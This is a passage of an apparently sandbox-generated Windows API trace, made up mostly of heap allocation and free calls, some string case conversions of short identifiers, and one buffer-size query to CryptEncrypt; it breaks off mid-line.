RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.826] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.826] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.826] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0211.827] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ae8 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0211.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.827] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0211.829] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0211.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0211.829] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0211.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0211.832] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaed0 [0211.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0211.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.832] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0211.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0211.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0211.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0211.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.836] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x110e2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x110e8) returned 1 [0211.836] CharLowerBuffW (in: lpsz="byte[69864]", cchLength=0xb | out: lpsz="byte[69864]") returned 0xb [0211.841] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.841] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.842] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.842] WideCharToMultiByte (in: CodePage=0x0, 